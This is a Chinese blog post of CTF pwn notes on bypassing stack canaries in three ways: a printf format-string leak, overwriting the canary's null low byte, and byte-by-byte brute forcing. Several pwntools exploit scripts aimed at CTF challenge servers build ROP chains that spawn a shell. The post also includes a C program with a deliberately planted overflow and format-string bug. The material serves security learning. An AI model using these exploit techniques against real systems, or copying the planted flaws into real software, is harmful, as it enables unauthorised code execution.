Canary,三种优雅姿势绕过

于 2024-07-06 18:55:09 发布
阅读量749 收藏 22
点赞数 23
分类专栏: pwn 文章标签: 笔记 pwn canary
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/140233860
版权

Canary(金丝雀),栈溢出保护

  1. canary保护是防止栈溢出的一种措施,其在调用函数时,在栈帧的上方放入一个随机值 ,绕过canary时首先需要泄漏这个随机值,然后再钩爪ROP链时将其作为垃圾数据写入,注意要放在rbp的前面,下面调试来观察随机值:

    image-20240630104806257

    1. 可以看到,在调用的函数的开头将rax作为随机值放入到了rbp上放的栈上

    image-20240630105026803

    image-20240630105225422

    1. 在函数的结尾,将随机值取出后,与本来的随机值做了对比,相同的才会返回,不同就会报错。

  2. 在进行栈溢出时,如果程序开启了canary保护,首先就需要泄漏这个随机值,否则其被覆盖掉后,程序在退出时再检查该值,会引发错误。

1. 利用printf格式化字符串 泄漏随机值。

  2. 先确定 随机值 相对于 格式化字符串 的位置,再利用 %n7$p 来输出该位置的内容,然后就是常规的栈溢出ROP构造,但此时要注意将泄漏出来的 canary 填充再rbp位置的前面:

  3. 例题:BUUCTF在线评测 (buuoj.cn)

from pwn import *
from LibcSearcher import *
# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')
p = remote("node5.buuoj.cn",29861)
elf = ELF('./bjdctf_2020_babyrop2')
#获取got、plt地址
got = elf.got['puts']
plt = elf.plt['puts']
print(hex(got),hex(plt))

p.recvuntil(b"I'll give u some gift to help u!\n")
#泄漏canary
p.sendline(b'%7$p')
p.recvuntil(b'0x')
canary = int(p.recv(16),16)
print("canary:",hex(canary))

#获取传参地址
pop_rdi_ret = 0x0000000000400993
#获取返回地址,便于下一次利用栈溢出
main_addr = 0x400887
print(hex(main_addr))
ret = 0x00000000004005f9

#构造payload,获得puts函数的地址,注意绕过canary,在rbp前面填充canary,计算canary前后填充的垃圾数据
payload = b'a'*(0x18)+p64(canary)+b'a'*8+p64(pop_rdi_ret)+p64(got)+p64(plt)+p64(main_addr)
p.sendline(payload)
p.recvuntil(b'Pull up your sword and tell me u story!\n')
addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(addr))
libc = LibcSearcher('puts',addr)
libc_base = addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
str_bin = libc_base + libc.dump('str_bin_sh')
print(hex(libc_base),hex(sys_addr),hex(str_bin))

p.recvuntil(b'Pull up your sword and tell me u story!\n')
#第二次利用栈溢出
payload = b'a'*(0x18)+p64(canary)+b'a'*8+p64(ret)+p64(pop_rdi_ret)+p64(str_bin)+p64(sys_addr)+p64(main_addr)
p.sendline(payload)
#p.sendline(b'cat flag')
# 与远程交互
p.interactive()

2. 覆盖截断字符获取canary

  1. Canry的最底一个字节设计为b’\x00’,是为了防止put,write,printf登将canary读出。如果利用栈溢出将最低位的b’\x00’覆盖,就可以利用答应函数将canary一致输出,最后再在最低位拼接上 b'\x00'就可以得到canary。

  2. 实例:

    // test.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
void getshell(void) {
    system("/bin/sh");
}
void init() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
}
void vuln() {
    char buf[100];
    for(int i=0;i<2;i++){
        read(0, buf, 0x200);
        printf(buf);
    }
}
int main(void) {
    init();
    puts("Hello Hacker!");
    vuln();
    return 0;
}

  3. 覆盖canary的最后一个字节,并从新组成canary:

    1. 首先确定要覆盖的位置,由于是 小端序 所以最后一个字节在高位,找到canary的偏移 var_c 后于 buf 相减再加一就可以指向canary的最低字节处,将其覆盖位a(注意使用send发送,不要最后的 回车符 )接受返会后要 拼接canary

      image-20240630204202081

    from pwn import *
from LibcSearcher import *
# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')
p = process("./test")
p.recvuntil(b'Hello Hacker!\n')
#发送var_c-buf+1个 b'a',最后一个a可以覆盖掉canary的最低字节 b`\x00`
payload = b'a'*(0x70-0xc+1)
p.send(payload)
#接受返回后从行拼接canary
canary = p.recv()[0x65:0x68]
canary = canary.rjust(4,b'\x00')
print(hex(u32(canary)))

    1. 再利用canary绕过金丝雀。

      shell = 0x080491B6
#canary后面还有0xc个字节才到返回地址,而不是仅查一个ebp(4个字节)
payload = b'a'*(0x70-0xc)+canary+b'a'*(0x8+4)+p32(shell)
p.sendline(payload)
# 与远程交互
p.interactive()

3. 逐字节爆破

题目地址:pwn

注意:canary爆破时,利用栈溢出,溢出到canary位置,从低位到高位 逐次覆盖掉canary的4个字节(一位无法绕过低位字节堆高位进行爆破,所以必须从低到高),且要求canary不能变化,绕过重开程序canary变化,就不适用爆破了。

  1. 函数的主逻辑在ctfshow,前面的函数基本无用,ctfshow中存在栈溢出:

    image-20240706175916809

  2. 爆破脚本:

    from pwn import *
from LibcSearcher import *
# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')

for i in range(0xff):
    p = remote("pwn.challenge.ctf.show",28104)
    p.recvuntil(b"How many bytes do you want to write to the buffer?\n>")
    p.sendline(b'100')
    p.recv()
    payload = b'a'*(32)+int.to_bytes(i)
    p.send(payload)
    data = p.recv()
    if b"Canary Value Incorrect!\n" not in  data:
        canary = data
        print(canary,i)
        break

    第一次爆破出来是:

    image-20240706183936688

    下面爆破第二个:

    from pwn import *

# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')

for i in range(0xff):
    p = remote("pwn.challenge.ctf.show",28104)
    p.recvuntil(b"How many bytes do you want to write to the buffer?\n>")
    p.sendline(b'100')
    p.recv()
    payload = b'a'*(32)+int.to_bytes(51)+int.to_bytes(i)
    p.send(payload)
    data = p.recv()
    if b"flag" in  data:
        canary = data
        print(canary,i)
        break

    image-20240706184045278

    第三个:

    from pwn import *

# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')

for i in range(0xff):
    p = remote("pwn.challenge.ctf.show",28104)
    # p = process('./pwn')
    # elf = ELF('./pwn')
    p.recvuntil(b"How many bytes do you want to write to the buffer?\n>")
    p.sendline(b'100')
    p.recv()
    payload = b'a'*(32)+int.to_bytes(51)+int.to_bytes(54)+int.to_bytes(i)
    p.send(payload)
    data = p.recv()
    if b"flag" in  data:
        canary = data
        print(canary,i)
        break

    image-20240706184250681

    第四个:

    from pwn import *

# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')

for i in range(0xff):
    p = remote("pwn.challenge.ctf.show",28104)
    p.recvuntil(b"How many bytes do you want to write to the buffer?\n>")
    p.sendline(b'100')
    p.recv()
    payload = b'a'*(32)+int.to_bytes(51)+int.to_bytes(54)+int.to_bytes(68)+int.to_bytes(i)
    p.send(payload)
    data = p.recv()
    if b"flag" in  data:
        canary = data
        print(canary,i)
        break

    image-20240706184354494

  3. 所以最后canary确定为0x21443633。注意大小端序,最后验证爆破的canary:

    from pwn import *

# 设置系统架构, 打印调试信息
# arch 可选 : i386 / amd64 / arm / mips
context(os='linux', arch='amd64', log_level='debug')

p = remote("pwn.challenge.ctf.show",28104)
p.recvuntil(b"How many bytes do you want to write to the buffer?\n>")
p.sendline(b'100')
p.recv()
payload = b'a'*(32)+p32(0x21443633)+b'a'*(0xc+4)+p32(0x08048696)
p.send(payload)
p.recv()
p.interactive()

    image-20240706184952360

波克比QWQ
关注
专栏目录
stack canary绕过思路
sea_time的博客
11-29 1959
canary 简介: 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,...
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
01-27
Canary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。 Stackcanary保护机制在刚进入函数时,在栈上放置一个标志canary,然后在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。 一,实验源码 文件名:Canary.c 命令
Canary绕过方法
最新发布
zhuo1358的博客
03-31 1550
Canary设计其低字节为\x00,本意是阻止被read、write等函数直接将Canary读出来。\x00二话不说,上题基础检查发现canary丢入ida中发现在循环printf,并且存在字符串漏洞(这个稍后再谈)同时有getshell函数可以直接拿shell接下来就是找canary到栈顶的偏移有两种方法,这里先介绍第一种看汇编语言跟进这段函数的汇编发现 多了一段异或比较可以判断canary在var_c里,所以buf 到canary的偏移为0x70-0xc。
Canary机制的绕过
weixin_30822451的博客
04-22 314
目标程序下载 提取码:8ypi 1.检查程序开启了哪些安全保护机制 Canary与NX开启了 Canary机制简介 64位的canary机制,会在函数头部添加: mov rax,QWORD PTR fs:0x28 //从fs:0x28寄存器中取一个值 mov QWORD PTR [rbp-0x8],rax //写入当...
Canary以及Canary绕过技巧
Sakura给爷pwn全场
12-11 355
canary介绍与绕过技巧: https://blog.csdn.net/weixin_43713800/article/details/105273284
pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 6072
Canary各种绕过姿势
【八芒星计划】绕过canary
carol2358的博客
09-02 675
文章目录wdb2018_guess wdb2018_guess 有趣的题目,本题fork了三次,那么就会gets三次 利用三次gets和canary,我们可利用stack smash来获得三次信息 第一次获得libc,第二次获得栈地址,第三次获得flag 覆盖argv[0],也就是程序名所在的位置 先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是stack_end,位置是utf8的位置 然后第二次输入通过environ来获得stack的地址 第三次就可以
canary介绍与绕过技巧
0pt1mus
04-02 6731
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当...
栈溢出之canary泄露与绕过“新方法” .pdf
09-05
在本文中,我们将探讨栈溢出的一种防护机制——Canary,以及如何绕过这种保护措施。 Canary,又称为Stack Guard或Stack Smashing Protector,是一种防止栈溢出攻击的技术。当启用Canary时,系统会在函数调用的栈帧...
绕过canary原理及其利用方式
glhdbk的博客
09-07 4289
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
PWN学习】cannary绕过方式汇总
weixin_41748164的博客
12-23 778
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
Canary保护机制及绕过
二狗的博客
01-29 910
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
canary机制及绕过策略
qq_44119514的博客
08-20 342
[pwn]ROP:三道题讲解花式绕过Canary栈保护
热门推荐
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
canary(栈溢出保护)纯新手入门(一)
qq_66690477的博客
05-08 1773
栈溢出保护是一种缓冲区溢出攻击的缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址让shellcode能够执行。 1.基础介绍 缓冲区:在计算机读取数据时, 在内存中开辟的临时存储数据的区域。 缓冲区溢出:针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁中断之际获取程序乃至系统的控制权。 计算机对接收的输入数据没有进行有效的检测(理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符),向缓冲区内填充数据
程序编译保护&堆栈溢出保护机制
wkshwbw的博客
12-11 1735
程序编译保护&堆栈溢出保护机制
浅析栈保护机制
najdhdfh的博客
11-11 3540
栈保护机制 canary canary意为金丝雀,作为栈保护技术之一,它的名字源自于17世纪,英国煤矿工人发现金丝雀对瓦斯十分敏感,每次下井都会带一只金丝雀作为“瓦斯检测指标”,从而挽救了很多工人的生命。 canary机制的原理很简单,就是在函数被调用之后,立即在栈帧中插入一个随机数,函数执行完在返回之前,程序通过检查这个随机数是否改变来判断是否存在栈溢出。如图所示,如果buf数据覆盖了目标地址(红色)处的数据,那canary(黄棕色)处的数据也会改变。 canary机制的绕过绕过canary也很简单
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值